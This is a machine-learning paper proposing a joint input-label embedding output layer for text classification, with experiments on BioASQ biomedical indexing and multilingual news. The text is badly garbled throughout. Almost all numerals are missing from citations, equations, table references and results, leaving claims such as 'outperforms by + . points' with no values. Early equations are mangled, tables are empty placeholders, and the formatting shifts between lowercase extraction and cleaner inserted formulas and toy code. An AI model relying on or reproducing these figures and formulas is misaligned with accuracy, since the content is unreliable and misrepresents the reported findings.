section describes our evaluation results and analysis, while section provides an overview of previous work and section concludes the paper and pro- vides future research directions. background: neural text classification we are given a collection d = {(xi,yi), i = , . . . ,n} made of n documents, where each document xi is associated with labels yi = {yij ∈ { , } | j = , . . . ,k}, and k is the total number of labels. each document xi = {w ,w , . . . ,wkitki} is a sequence of words grouped into sentences, with ki being the num- ber of sentences in document i and tj being the number of words in sentence j. each label j has a textual description comprised of multiple words, cj = {cj ,cj , . . . ,cjlj | j = , . . . ,k} with lj being the number of words in each description. given the input texts and their associated labels seen during the training portion of d, our goal is to learn a text classifier which is able to predict labels both in the seen, ys, or unseen, yu, label sets, defined as the sets of unique labels which have been seen or not during training respectively and, hence, y ∩yu = ∅ and y = ys ∪yu. . input text representation to encode the input text, we focus on hierarchical attention networks (hans), which are competitive for monolingual (yang et al., ) and multilin- gual text classification (pappas and popescu-belis, ). the model takes as input a document x and outputs a document vector h. the input words and label words are represented by vectors in ird from the same embeddings e ∈ ir|v|×d, where v is the vocabulary and d is the embedding dimension; e can be pre-trained or learned jointly with the rest of the model. the model has two levels of abstraction, word and sentence. the word level is made of an encoder network gw and an attention network aw, while the sentence level similarly in- cludes an encoder and an attention network. encoders. the function gw encodes the sequence of input words {wit | t = , . . . ,ti} for each sen- tence i of the document, noted as: h(it)w = gw(wit), t ∈ [ ,ti], ( ) and at the sentence level, after combining the in- termediate word vectors {h(it)w | t = , . . . ,ti} to a sentence vector si ∈ irdw (see below), where dw is the dimension of the word encoder, the func- tion gs encodes the sequence of sentence vectors {si | i = , . . . ,k}, noted as h (i) s . the gw and gs functions can be any feed-forward (dense) or recurrent networks, e.g. gru (cho et al., ). attention. the αw and αs attention mechanisms, which estimate the importance of each hidden note that depending on the number of labels per docu- ment the problem can be a multi-label or multi-class problem. this statement holds true for multilingual classification problems too if the embeddings are aligned across languages. state vector, are used to obtain the sentence si and document representation h respectively. the sen- tence vector is thus calculated as follows: si = ti∑ t= α(it)w h (it) w = ti∑ t= exp(v>ituw)∑ j exp(v > ijuw) h(it)w , ( ) where vit = fw(h (it) w ) is a fully-connected net- work with ww parameters. the document vector h ∈ irdh , where dh is the dimension of the sen- tence encoder, is calculated similarly, by replacing uit with vi = fs(h (i) s ) which is a fully-connected network with ws parameters, and uw with us, which are parameters of the attention functions. . label text representation to encode the label text we use an encoder func- tion which takes as input a label description cj and outputs a label vector ej ∈ irdc ∀j = , . . . , k. 
for efficiency reasons, we use a simple, parameter- free function to compute ej , namely the average of word vectors which describe label j, namely ej = lj ∑lj t= cjt, and hence dc = d in this case. by stacking all these label vectors into a ma- trix, we obtain the label embedding e ∈ ir|y|×d. in principle, we could also use the same encoder functions as the ones for input text, but this would increase the computation significantly; hence, we keep this direction as future work. . output layer parametrizations . . typical linear unit the most typical output layer, consists of a linear unit with a weight matrix w ∈ irdh×|y| and a bias vector b ∈ ir|y| followed by a softmax or sigmoid activation function. given the encoder’s hidden representation h with dimension size dh, the probability distribution of output y given input x is proportional to the following quantity: p(y|x) ∝ exp(w>h + b). ( ) the parameters in w can be learned separately or be tied with the parameters of the embedding e by setting w = et if the input dimension of w is restricted to be the same as that of the embedding e (d = dh) and each label is represented by a single word description i.e. when y corresponds to v and e = e. in the latter case, eq. becomes: p(y|x) ∝ exp(eh + b). ( ) either way, the parameters of such models are typ- ically learned with cross-entropy loss, which is suitable for classification problems. however, in both cases they cannot be applied to labels which are not seen during training, because each label has learned parameters which are specific to that label, so the parameters for unseen labels cannot be learned. we now turn our focus to a class of models which can handle unseen labels. . . bilinear input-label unit joint input-output embedding models can gener- alize from seen to unseen labels because the pa- rameters of the label encoder are shared. the previously proposed joint input-output embedding models by yazdani and henderson ( ) and nam et al. ( ) are based on the following bi- linear ranking function f(·): f(x,y) = ewh, ( ) where e ∈ ir|y|×d is the label embedding and w ∈ ird×dh is the bilinear embedding. this func- tion allows one to define the rank of a given label y with respect to x and is trained using hinge loss to rank positive labels higher than negative ones. but note that the use of this ranking loss means that they do not model the conditional probability, as do the traditional models above. limitations. firstly, the above formula can only capture linear relationships between encoded text (h) and label embedding (e) through w. we argue that the relationships between different labels are non-linear due to the complex interactions of the semantic relations across labels but also between labels and different encoded inputs. a more ap- propriate form for this purpose would include a non-linear transformation σ(·), e.g. with either: (a) σ(ew)︸ ︷︷ ︸ label structure h or (b) e σ(wh)︸ ︷︷ ︸ input structure . ( ) secondly, it is hard to control their output layer capacity due to their bilinear form, which uses a matrix of parameters (w) whose size is bounded by the dimensionalities of the label embedding and the text encoding. thirdly, their loss function optimizes ranking instead of classification perfor- mance and thus treats the ground-truth as a ranked list when in reality it consists of one or more inde- pendent labels. summary. 
summary. we hypothesize that these are the reasons why these models do not yet perform well on seen labels compared to models which make use of the typical linear unit, and why they do not take full advantage of the structure of the problem when tested on unseen labels. ideally, we would like to have a model which addresses these issues and combines the benefits of both the typical linear unit and the joint input-label models.
the proposed output layer parametrization for text classification
we propose a new output layer parametrization for neural text classification which is comprised of a generalized input-label embedding, which captures the structure of the labels, the structure of the encoded texts and the interactions between the two, followed by a classification unit which is independent of the label set size. the resulting model has the following properties: (i) it is able to capture complex output structure, (ii) it has a flexible parametrization which allows its capacity to be controlled, and (iii) it is trained with a classification surrogate loss such as cross-entropy. the model is depicted in figure . in this section, we describe the model in detail, showing how it can be trained efficiently for arbitrarily large label sets and how it is related to previous models.
. a generalized input-label embedding
let g_in(h) and g_out(e_j) be two non-linear projections of the encoded input, i.e. the document h, and of any encoded label e_j, where e_j is the j-th row vector of the label embedding matrix e, which have the following form:
e'_j = g_out(e_j) = σ(e_j u + b_u) ( )
h' = g_in(h) = σ(v h + b_v), ( )
where σ(·) is a non-linear activation function such as relu or tanh, the matrix u ∈ R^{d \times d_j} and bias b_u ∈ R^{d_j} are the linear projection of the labels, and the matrix v ∈ R^{d_j \times d_h} and bias b_v ∈ R^{d_j} are the linear projection of the encoded input. note that the projections for h' and e'_j could be high-rank or low-rank depending on their initial dimensions and the target joint space dimension. also let e' ∈ R^{|y| \times d_j} be the matrix resulting from projecting all the outputs e_j to the joint space, i.e. g_out(e).
figure : each encoded text and label are projected to a joint input-label multiplicative space, the output of which is processed by a classification unit with label-set-size independent parametrization.
the conditional output probability distribution can now be re-written as:
p(y|x) ∝ \exp(e' h') ∝ \exp(g_out(e) g_in(h)) ∝ \exp(σ(e u + b_u) σ(v h + b_v)). ( )
crucially, this function has no label-set-size dependent parameters, unlike w and b in eq. . in principle, this parametrization can be used for both multi-class and multi-label problems, by defining the exponential in terms of a softmax or a sigmoid function respectively. however, in this paper we will focus on the latter.
. classification unit
we require that our classification unit parameters depend only on the joint input-label space above. to represent the compatibility between any encoded input text h_i and any encoded label e_j for this task, we define their joint representation based on multiplicative interactions in the joint space:
g_joint^{(ij)} = g_in(h_i) ⊙ g_out(e_j), ( )
where ⊙ denotes component-wise multiplication.
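to make the joint projections and the multiplicative compatibility above concrete, the following sketch shows the two projections and their joint representation for a single document and a batch of label vectors. it is a minimal numpy illustration under our own assumptions (toy dimensions, relu as σ); the scalar scoring unit applied on top of this joint space is described next.

```python
# minimal sketch of the generalized input-label embedding (toy example, our assumptions).
import numpy as np

rng = np.random.default_rng(1)
d, d_h, d_j, n_labels = 6, 8, 10, 5   # toy dimensions; d_j is the joint-space size
E = rng.normal(size=(n_labels, d))    # encoded labels (e.g. averaged word vectors)
h = rng.normal(size=(d_h,))           # encoded document from the text encoder

U, b_u = rng.normal(size=(d, d_j)), np.zeros(d_j)      # label-side projection
V, b_v = rng.normal(size=(d_j, d_h)), np.zeros(d_j)    # input-side projection
sigma = lambda x: np.maximum(x, 0.0)                   # non-linearity

E_prime = sigma(E @ U + b_u)          # g_out(E): all labels in the joint space
h_prime = sigma(V @ h + b_v)          # g_in(h): document in the joint space
g_joint = E_prime * h_prime           # component-wise interactions, one row per label

print(E_prime.shape, h_prime.shape, g_joint.shape)   # (5, 10) (10,) (5, 10)
```

note that the shapes of u and v depend only on d, d_h and the chosen d_j, not on the number of labels, which is what allows the capacity to be controlled independently of the label set size.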
the probability for h_i to belong to one of the k known labels is modeled by a linear unit which maps any point in the joint space to a score which indicates the validity of the combination:
p_val^{(ij)} = g_joint^{(ij)} w + b, ( )
where w ∈ R^{d_j} is a weight vector and b is a scalar bias. we compute the output of this linear unit for each known label which we would like to predict for a given document i, namely:
p_val^{(i)} = [p_val^{(i1)}, p_val^{(i2)}, . . . , p_val^{(ik)}]^\top = [g_joint^{(i1)} w + b, g_joint^{(i2)} w + b, . . . , g_joint^{(ik)} w + b]^\top. ( )
for each row, the higher the value, the more likely the label is to be assigned to the document. to obtain valid probability estimates and be able to train with binary cross-entropy loss for multi-label classification, we apply a sigmoid function as follows:
ŷ_i = p̂(y_i | x_i) = \frac{1}{1 + e^{-p_val^{(i)}}}. ( )
summary. by adding the above changes to the general form of eq. , the conditional probability p(y_i | x_i) is now proportional to the following quantity:
\exp(σ(e u + b_u)(σ(v h + b_v) ⊙ w) + b). ( )
note that the number of parameters in this equation is independent of the size of the label set, given that u, v, w and b depend only on d_j, and k can vary arbitrarily. this allows the model to scale up to large label sets and generalize to unseen labels. lastly, the proposed output layer addresses all the limitations of the previous models, as follows: (i) it is able to capture complex structure in the joint input-output space, (ii) it provides a means to easily control its capacity d_j, and (iii) it is trainable with cross-entropy loss.
. training objectives
the training objective for the multi-label classification task is based on binary cross-entropy loss. assuming θ contains all the parameters of the model, the training loss is computed as follows:
l(θ) = -\frac{1}{nk} \sum_{i=1}^{n} \sum_{j=1}^{k} h(y_{ij}, ŷ_{ij}), ( )
where h is the binary cross-entropy between the gold label y_{ij} and the predicted label ŷ_{ij} for a document i and a candidate label j.
we handle multiple languages according to firat et al. ( ) and pappas and popescu-belis ( ). assuming that Θ = {θ_1, θ_2, . . . , θ_m} are all the parameters required for each of the m languages, we use a joint multilingual objective based on the sum of cross-entropy losses:
l(Θ) = -\frac{1}{z} \sum_{i}^{n_e} \sum_{l}^{m} \sum_{j=1}^{k} h(y_{ij}^{(l)}, ŷ_{ij}^{(l)}), ( )
where z = n_e m k, with n_e being the number of examples per epoch. at each iteration, a document-label pair for each language is sampled. in addition, multilingual models share a certain subset of the encoder parameters during training, while the output layer parameters are kept language-specific, as described by pappas and popescu-belis ( ). in this paper, we share most of the output layer parameters, namely the ones from the input-label space (u, v, b_v, b_u), and we keep only the classification unit parameters (w, b) language-specific.
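continuing the numpy sketch above, the following lines add the scalar scoring unit, the sigmoid, and the binary cross-entropy loss. as before, this is our own toy illustration rather than the released implementation, and the variable names are assumptions.

```python
# continuation of the toy sketch: scoring unit, sigmoid and binary cross-entropy loss.
import numpy as np

rng = np.random.default_rng(2)
d_j, n_labels = 10, 5
g_joint = rng.normal(size=(n_labels, d_j))                  # joint representations from the previous sketch
y_true = rng.integers(0, 2, size=n_labels).astype(float)    # gold multi-label vector

w, b = rng.normal(size=(d_j,)), 0.0      # classification unit: independent of n_labels
p_val = g_joint @ w + b                  # one validity score per known label
y_hat = 1.0 / (1.0 + np.exp(-p_val))     # sigmoid -> probability estimates

eps = 1e-12                              # numerical safety for the logarithms
bce = -np.mean(y_true * np.log(y_hat + eps) + (1 - y_true) * np.log(1 - y_hat + eps))
print(p_val.shape, y_hat.shape, float(bce))
```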
. scaling up to large label sets
for a very large number d_j of joint-space dimensions in our parametrization, the computational complexity increases prohibitively, because our projection requires a large matrix multiplication between u and e, which depends on |y|. in such cases, we resort to sampling-based training, by adopting the commonly used negative sampling method proposed by mikolov et al. ( ). let x_i ∈ R^d and y_{ik} ∈ {0, 1} be an input-label pair and ŷ_{ik} the output probabilities from our model (eq. ). by introducing the sets k_i^p and k_i^n, which contain the indices of the positive and negative labels respectively for the i-th input, the loss l(θ) in eq. can be re-written as follows:
l(θ) = -\frac{1}{z} \sum_{i=1}^{n} \sum_{j=1}^{k} [y_{ij} \log ŷ_{ij} + \bar{y}_{ij} \log(1 - ŷ_{ij})] = -\frac{1}{z} \sum_{i=1}^{n} \Big[ \sum_{j \in k_i^p} \log ŷ_{ij} + \sum_{j \in k_i^n} \log(1 - ŷ_{ij}) \Big], ( )
where z = nk and \bar{y}_{ij} is (1 - y_{ij}). to reduce the computational cost needed to evaluate ŷ_{ij} over the whole negative label set k_i^n, we sample k* labels from the negative label set with probability p = 1/|k_i^n| to create a sampled subset of k_i^n. this enables training on arbitrarily big label sets without increasing the computation required. by controlling the number of samples, we can drastically speed up the training time, as we demonstrate empirically in section . . exploring more informative sampling methods, e.g. importance sampling, would be an interesting direction for future work.
. relation to previous parametrizations
the proposed embedding form can be seen as a generalization of the input-label embeddings with a bilinear form, because its degenerate form is equivalent to the bilinear form of eq. . in particular, this can be simply derived if we set one of the two non-linear projection functions in the second line of eq. to be the identity function, e.g. g_out(·) = i, set all biases to zero, and make the σ(·) activation function linear, as follows:
σ(e u + b_u) σ(v h + b_v) = (e i)(v h) = e v h, ( )
where v by consequence has the same number of dimensions as w ∈ R^{d \times d_h} from the bilinear input-label embedding model of eq. .
experiments
the evaluation is performed on large-scale biomedical semantic indexing using the bioasq dataset, obtained by nam et al. ( ), and on multilingual news classification using the dw corpus, which consists of eight language datasets obtained by pappas and popescu-belis ( ). the statistics of these datasets are listed in table .
. biomedical text classification
we evaluate on biomedical text classification to demonstrate that our generalized input-label model scales to very large label sets and performs better than previous joint input-label models in both the seen and the unseen label prediction scenarios.
. . settings
we follow the exact evaluation protocol, data and settings of nam et al. ( ), as described below. we use the bioasq task a dataset, which is a collection of scientific publications in biomedical research. the dataset contains about m documents labeled with around labels out of , , which are defined according to the medical subject headings (mesh) hierarchy. the data was minimally pre-processed with tokenization, number replacement (num) and rare word replacement (unk), and split with the provided script by year, so that the training set includes all documents until and the ones from to were kept for the test set; this corresponded to , , documents for training and , , for testing. for validation, a set of , documents was randomly sampled from the training set. we report the same ranking-based evaluation metrics as nam et al. ( ), namely ranking loss (rl), average precision (avgpr) and one-error loss (oneerr).
table : dataset statistics for bioasq and the dw corpus and its language subsets (en, de, es, pt, uk, ru, ar, fa): #count is the number of documents, #words is the number of unique words in the vocabulary v, and w̄_d and w̄_l are the average number of words per document and per label respectively.
our hyper-parameters were selected on validation data based on average precision as follows: -dimensional word embeddings, encoder and attention (same dimensions as the baselines), joint input-label embedding of , batch size of , maximum number of words per document and words per label, relu activation, . % negative label sampling, and optimization with adam until convergence. the word embeddings were learned end-to-end on the task. the baselines are the joint input-label models from nam et al. ( ), noted as [n ], namely:

• wsabie+: an extension of the original wsabie model by weston et al. ( ) which, instead of learning a ranking model with fixed document features, jointly learns features for documents and words, and is trained with the warp ranking loss.
• aitextml: the model proposed by nam et al. ( ) with the purpose of jointly learning representations of documents, labels and words, along with a joint input-label space trained with the warp ranking loss.

the scores of the wsabie+ and aitextml baselines in table are the ones reported by nam et al. ( ). in addition, we report scores of a word-level attention neural network (wan) with dense encoder and attention followed by a sigmoid output layer, trained with binary cross-entropy loss. our model replaces wan's output layer with a generalized input-label embedding layer and its variations, noted gile-wan. for comparison, we also compare to bilinear input-label embedding versions of wan for the model by yazdani and henderson ( ), noted as bil-wan [yh ], and the one by nam et al. ( ), noted as bil-wan [n ]. note that the aitextml parameter space is huge and makes learning difficult for our models (linear wrt. labels and documents). instead, we make sure that our models have far fewer parameters than the baselines (table ). (here, the word embeddings are included in the parameter statistics because they are variables of the network.)

table : biomedical semantic indexing results computed over labels seen and unseen during training, i.e. the full-resource versus zero-resource settings. best scores among the competing models are marked in bold. (the table compares wsabie+, aitextml (avg/inf), wan, bil-wan [yh ], bil-wan [n ], gile-wan and its ablations (constrained dj, only label, only input) in terms of rl, avgpr, oneerr and parameter counts; the numeric values are not preserved in this copy.)

. . results
the results on biomedical semantic indexing on seen and unseen labels are shown in table . we observe that the neural baseline, wan, outperforms wsabie+ and aitextml on the seen labels, namely by + . and + . points in terms of avgpr respectively. the differences are even more pronounced when considering the ranking loss and one-error metrics. this result is compatible with previous findings that existing joint input-label models are not able to outperform strong supervised baselines on seen labels. however, wan is not able to generalize at all to unseen labels, hence wsabie+ and aitextml have a clear advantage in the zero-resource setting.
in contrast, our generalized input-label model, gile-wan, outperforms wan even on seen labels, where our model has higher average precision by + . points, better ranking loss by + % and comparable oneerr (− %). (in our preliminary experiments, we also trained the neural model with a hinge loss, as wsabie+ and aitextml, but it performed similarly to them and much worse than wan, so we did not experiment with it further.) and this gain is not at the expense of performance on unseen labels. gile-wan outperforms wsabie+ and the aitextml variants (avg when using the average of word vectors and inf when using inferred label vectors to make predictions) by a large margin in both cases, e.g. by + . , + . points on seen labels and by + . , + . points in terms of average precision on unseen labels, respectively. interestingly, our gile-wan model also outperforms the two previous bilinear input-label embedding formulations of yazdani and henderson ( ) and nam et al. ( ), namely bil-wan [yh ] and bil-wan [n ], by + . , + . points on seen labels and + . and + . points on unseen labels, respectively, even when they are trained with the same encoders and loss as ours. these models are not able to outperform the wan baseline when evaluated on the seen labels, namely they have − . and − . points lower average precision than wan, but they outperform wsabie+ and aitextml on both seen and unseen labels. overall, the results show a clear advantage of our generalized input-label embedding model over previous models on both seen and unseen labels.

. . ablation analysis
to evaluate the effectiveness of individual components of our model, we performed an ablation study (last three rows in table ). note that when we use only the label or only the input embedding in our generalized input-label formulation, the dimensionality of the joint space is constrained to be the dimensionality of the encoded labels and inputs respectively, that is dj= in our experiments. all three variants of our model outperform the previous embedding formulations of nam et al. ( ) and yazdani and henderson ( ) in all metrics except avgpr on seen labels, where they score slightly lower. the decrease in avgpr for our model variants with dj= compared to the neural baselines could be attributed to the difficulty of learning the parameters of a highly non-linear space with only a few hidden dimensions. indeed, when we increase the number of dimensions (dj= ), our full model outperforms them by a large margin. recall that this increase in capacity is only possible with our full model definition in eq. , and none of the other variants allow us to do this without interfering with the original dimensionality of the encoded labels (e) and input (ht). in addition, our model variants with dj= exhibit consistently higher scores than the baselines in terms of most metrics on both seen and unseen labels, which suggests that they are able to capture more complex relationships across labels and between encoded inputs and labels. overall, the best performance among our model variants is achieved when using only the label embedding; hence, it is the most significant component of our model. surprisingly, our model with only the label embedding achieves higher performance than our full model on unseen labels, but it is far behind our full model when we consider performance on both seen and unseen labels. when we constrain our full model to have the same dimensionality as the other variants, i.e.
dj= , it outperforms the one that uses only the input embedding in most metrics and is outperformed by the one that uses only the label embedding.

. multilingual news text classification
we evaluate on multilingual news text classification to demonstrate that our output layer based on the generalized input-label embedding outperforms previous models with a typical output layer in a wide variety of settings, even for labels which have been seen during training.

. . settings
we follow the exact evaluation protocol, data and settings of pappas and popescu-belis ( ), as described below. the dataset is split per language into % for training, % for validation and % for testing. we evaluate on both types of labels (general yg and specific ys) in a full-resource scenario, and only on the general labels (yg) in a low-resource scenario. accuracy is measured with micro-averaged f percentage scores. the word embeddings for this task are the aligned pre-trained -dimensional multi-cca multilingual word embeddings by ammar et al. ( ) and are kept fixed during training. (the word embeddings are therefore not included in the parameter statistics, because they are not variables of the network.) the sentences are already truncated at a length of words and the documents at a length of sentences. the hyper-parameters were selected on validation data as follows: -dimensional encoder and attention, relu activation, batch size of , epoch size of k, no negative sampling (all labels are used) and optimization with adam until convergence.

to ensure equal capacity to the baselines, we use approximately the same total number of parameters as the baseline classification layers, by setting
$$d_j \simeq \frac{d_h \cdot |k^{(i)}|}{d_h + d}, \quad i = 1, \ldots, m,$$
in the monolingual case, and similarly $d_j \simeq (d_h \sum_{i=1}^{m} |k^{(i)}|)/(d_h + d)$ in the multilingual case, where $k^{(i)}$ is the number of labels in language $i$. the hierarchical models have dense encoders in all scenarios (tables , , and ), except for the varying-encoder experiment (table ). for the low-resource scenario, the levels of data availability are: tiny from . % to . %, small from % to % and medium from % to % of the original training set. for each level, the average f across discrete increments of . , and is reported, respectively. the decision thresholds, which were tuned on validation data by pappas and popescu-belis ( ), are set as follows: for the full-resource scenario it is set to . for |ys| < and . for |ys| ≥ , and for the low-resource scenario it is set to . for all sets.

the baselines are all the monolingual and multilingual neural networks from pappas and popescu-belis ( ), noted as [pb ], namely:

• nn: a neural network which feeds the average vector of the input words directly to a classification layer, as the one used by klementiev et al. ( ).
• hnn: a hierarchical network with encoders and average pooling at every level, followed by a classification layer, as the one used by tang et al. ( ).
• han: a hierarchical network with encoders and attention, followed by a classification layer, as the one used by yang et al. ( ).
• mhan: three multilingual hierarchical networks with shared encoders, noted mhan-enc, shared attention, noted mhan-att, and shared attention and encoders, noted mhan-both, as the ones used by pappas and popescu-belis ( ).

for reference, in table we also compare to a logistic regression trained with unigrams over the full vocabulary and over the top- % most frequent words by mrini et al. ( ), noted as [m ], which uses the same settings and data. to ensure a controlled comparison to the above baselines, for each model we evaluate a version where its output layer is replaced by our generalized input-label embedding output layer using the same number of parameters; these have the abbreviation "gile" prepended to their name (e.g. gile-han). the scores of the han and mhan models in tables , and are the ones reported by pappas and popescu-belis ( ), while for table we train them ourselves using their code. lastly, the best score for each pairwise comparison between a joint input-label model and its counterpart is marked in bold.

table : full-resource classification results on general (upper half) and specific (lower half) labels using monolingual and bilingual models with dense encoders on english as target (left) and the auxiliary language as target (right). the average bilingual f -score (%) is noted avg and the top ones per block are underlined. the monolingual scores on the left come from a single model, hence a single score is repeated multiple times. (the table compares nn, hnn, han and mhan against their gile counterparts across the auxiliary languages de, es, pt, uk, ru, ar, fa; the numeric values are not preserved in this copy.)

. . results
table displays the results of full-resource document classification using dense encoders for both general and specific labels. on the left, we display the performance of models on the english sub-corpus when english and an auxiliary language are used for training, and on the right, the performance on the auxiliary-language sub-corpus when that language and english are used for training.
the results show that in % of comparisons on general labels (top half of table ) the joint input-label models improve consistently over the corresponding models using a typical sigmoid classification layer. this finding validates our main hypothesis that the joint input-label models successfully exploit the semantics of the labels, which provide useful cues for classification, as opposed to models which are agnostic to label semantics. the results for specific labels (bottom half of table ) demonstrate the same trend, with the joint input-label models performing better in % of comparisons.

table : full-resource classification results on general (yg) topic labels with dense and gru encoders. reported are also the average number of parameters per language (nl) and the average f per language (fl). (the table compares logreg-bow, logreg-bow- %, han-bigru, han-gru and han-dense against gile-han-bigru, gile-han-gru and gile-han-dense across the eight languages; the numeric values are not preserved in this copy.)

in table , we also directly compare our embedding to previous bilinear input-label embedding formulations when using the best monolingual configuration (han) from table , exactly as done in section . . the results on the general labels show that gile outperforms the previous bilinear input-label models, bil [yh ] and bil [n ], by + . and + . percentage points on average respectively. this difference is much more pronounced on the specific labels, where the label set is much larger, namely + . and + . percentage points respectively. similarly, our model with constrained dimensionality is also as good as or better on average than the bilinear input-label models, by + . and + . on general labels and by - . and + . on specific labels respectively, which highlights the importance of learning non-linear relationships across encoded labels and documents. among our ablated model variants, as in the previous section, the best is the one with only the label projection, but it is still worse than our full model by - . percentage points. the improvements of gile against each baseline are significant and consistent on both datasets. hence, in the following experiments we will only consider the best of these alternatives.

table : direct comparison with previous bilinear input-label models, namely bil [yh ] and bil [n ], and with our ablated model variants, using the best monolingual configuration (han) from table on both general (upper half) and specific (lower half) labels. best scores among the competing models are marked in bold. (the table reports per-language scores for the linear [pb ] output layer, bil [yh ], bil [n ], gile and its ablations (constrained dj, only label, only input); the numeric values are not preserved in this copy.)

the best bilingual performance on average is that of the gile-mhan-att model, for both general and specific labels. this improvement can be attributed to the effective sharing of label semantics across languages through the joint multilingual input-label output layer.
effectively, this model has the same multilingual sharing scheme as the best model reported by pappas and popescu-belis ( ), mhan-att, namely sharing attention at each level of the hierarchy, which agrees well with their main finding. interestingly, the improvement holds when using different types of hierarchical encoders, namely dense, gru and bigru, as shown in table , which demonstrates the generality of the approach. in addition, our best models outperform logistic regression trained either on the top- % most frequent words or on the full vocabulary, even though our models use many fewer parameters, namely k/ k vs. m/ m. increasing the capacity of our models should lead to even further improvements.

table : multilingual learning results. the columns are the average number of parameters per language (nl) and the average f per language (fl). (the table compares han and mhan with gile-han and gile-mhan on general and specific labels when training on an increasing number of languages; the numeric values are not preserved in this copy.)

multilingual learning. so far, we have shown that the proposed joint input-label models outperform typical neural models when training with one and two languages. does the improvement remain when increasing the number of languages even more? to answer this question, we report in table the average f -score per language for the best baselines from the previous experiment (han and mhan-att) and the proposed joint input-label versions of them (gile-han and gile-mhan-att) when increasing the number of languages ( , and ) that are used for training. overall, we observe that the joint input-label models outperform all the baselines independently of the number of languages involved in the training, while having the same number of parameters. we also replicate the previous result that a second language helps, but that beyond that there is no further improvement.

low-resource transfer. we investigate here whether joint input-label models are useful for low-resource languages. table shows the low-resource classification results from english to seven other languages when varying the amount of their training data. our model with both shared encoders and attention, gile-mhan, outperforms the previous models on average, namely han (yang et al., ) and mhan (pappas and popescu-belis, ), for low-resource classification in the majority of the cases.

table : low-resource classification results with various sizes of training data using the general labels. (the table reports scores for han, mhan and gile-mhan when transferring from english to de, es, pt, uk, ru, ar and fa at each data-availability level; the numeric values are not preserved in this copy.)

the shared input-label space appears to be helpful especially when transferring from english to german, portuguese and arabic. gile-mhan is significantly behind mhan when transferring knowledge from english to spanish and to russian in the . - . % resource setting, but in the rest of the cases they have very similar scores.

label sampling. to speed up computation, it is possible to train our model by sampling labels instead of training over the whole label set. how much speed-up can we achieve from this label sampling approach and still retain good levels of performance?
in figure , we attempt to answer this question by reporting the performance of our gile-hnn model when varying the amount of labels (%) that it uses for training over the english general and specific labels of the dw dataset. in both cases, the performance of gile-hnn tends to increase as the percentage of labels sampled increases, but it levels off for the higher percentages. for general labels, top performance is reached with a % to % sampling rate, which translates to a % to % speedup, while for the specific labels it is reached with a % to % sampling rate, which translates to a % to % speedup.

figure : varying sampling percentage for general and specific english labels. (top) gile-hnn is compared against hnn in terms of f (%). (bottom) the runtime speedup over gile-hnn trained on the full label set. (the plots themselves are not preserved in this copy.)

the speedup is correlated with the size of the label set, since there are many fewer general labels than specific labels, namely vs , here. hence, we expect even higher speedups for bigger label sets. interestingly, gile-hnn with label sampling reaches the performance of the baseline with a % and % sample for general and specific labels respectively. this translates to a speedup of % and % respectively compared to a gile-hnn trained over all labels. overall, these results show that our model is effective and that it can also scale to large label sets. label sampling should also be useful in tasks where computational resources are limited or budgeted.

related work

. neural text classification
research in neural text classification was initially based on feed-forward networks, which required unsupervised pre-training (collobert et al., ; mikolov et al., ; le and mikolov, ); later work focused on networks with hierarchical structure. kim ( ) proposed a convolutional neural network (cnn) for sentence classification. johnson and zhang ( ) proposed a cnn for high-dimensional data classification, while zhang et al. ( ) adopted a character-level cnn for text classification. lai et al. ( ) proposed a recurrent cnn to capture sequential information, which outperformed simpler cnns. lin et al. ( ) and tang et al. ( ) proposed hierarchical recurrent neural networks and showed that they were superior to cnn-based models. yang et al. ( ) demonstrated that a hierarchical attention network with bi-directional gated encoders outperforms previous alternatives. pappas and popescu-belis ( ) adapted such networks to learn hierarchical document structures with shared components across different languages. the issue of scaling to large label sets has been addressed previously with output layer approximations (morin and bengio, ) and with the use of sub-word units or character-level modeling (sennrich et al., ; lee et al., ), which is mainly applicable to structured prediction problems. despite these numerous studies, most existing neural text classification models ignore label descriptions and semantics. moreover, they are based on typical output layer parametrizations which depend on the label set size, and thus are not able to scale well to large label sets nor to generalize to unseen labels. our output layer parametrization addresses these limitations and could potentially improve such models.

. output representation learning
there exist studies which aim to learn output representations directly from data without any semantic grounding to word embeddings (srikumar and manning, ; yeh et al., ; augenstein et al., ).
such methods have a label- set-size dependent parametrization, which makes them data hungry, less scalable on large label sets and incapable of generalizing to unseen classes. wang et al. ( ) addressed the lack of seman- tic grounding to word embeddings by proposing an efficient method based on label-attentive text representations which are helpful for text classi- fication. however, in contrast to our study, their parametrization is still label-set-size dependent and thus their model is not able to scale well to large label sets nor to generalize to unseen labels. . zero-shot text classification several studies have focused on learning joint input-label representations grounded to word se- mantics for unseen label prediction for images (weston et al., ; socher et al., ; norouzi et al., ; zhang et al., ; fu et al., ), called zero-shot classification. however, there are fewer such studies for text classification. dauphin et al. ( ) predicted semantic utterances of text by mapping them in the same semantic space with the class labels using an unsupervised learning ob- jective. yazdani and henderson ( ) proposed a zero-shot spoken language understanding model based on a bilinear input-label model able to gen- eralize to previously unseen labels. nam et al. ( ), proposed a bilinear joint document-label embedding which learns shared word representa- tions between documents and labels. more re- cently, shu et al. ( ) proposed an approach for open-world classification which aims to identify novel documents during testing but it is not able to generalize to unseen classes. perhaps, the most similar model to ours is from the recent study by pappas et al. ( ) on neural machine translation, with the difference that they have single-word la- bel descriptions and they use a label-set-dependent bias in a softmax linear prediction unit, which is designed for structured prediction. hence, their model can neither handle unseen labels nor multi- label classification, as we do here. compared to previous joint input-label models, the proposed model has a more general and flexi- ble parametrization which allows the output layer capacity to be controlled. moreover, it is not re- stricted to linear mappings, which have limited expressivity, but uses nonlinear mappings, similar to energy-based learning networks (lecun et al., ; belanger and mccallum, ). the link to the latter can be made if we regard p(ij)val in eq. as an energy function for the i-th document and the j-th label, the calculation of which uses a simple multiplicative transformation (eq. ). lastly, the proposed model performs well on both seen and unseen label sets by leveraging the binary cross- entropy loss, which is the standard loss for classi- fication problems, instead of a ranking loss. conclusion we proposed a novel joint input-label embedding model for neural text classification which gener- alizes over existing input-label models and ad- dresses their limitations while preserving high per- formance on both seen and unseen labels. com- pared to baseline neural models with a typical out- put layer, our model is more scalable and has bet- ter performance on the seen labels. compared to previous joint input-label models, it performs sig- nificantly better on unseen labels without compro- mising performance on the seen labels. these im- provements can be attributed to the the ability of our model to capture complex input-label relation- ships, to its controllable capacity and to its training objective which is based on cross-entropy loss. 
as future work, the label representation could be learned by a more sophisticated encoder, and the label sampling could benefit from importance sampling to avoid revisiting uninformative labels. another interesting direction would be to find a more scalable way of increasing the output layer capacity, for instance using a deep rather than wide classification network. moreover, adapting the proposed model to structured prediction, for instance by using a softmax classification unit instead of a sigmoid one, would benefit tasks such as neural machine translation, language modeling and summarization, in isolation but also when trained jointly with multi-task learning.

acknowledgments
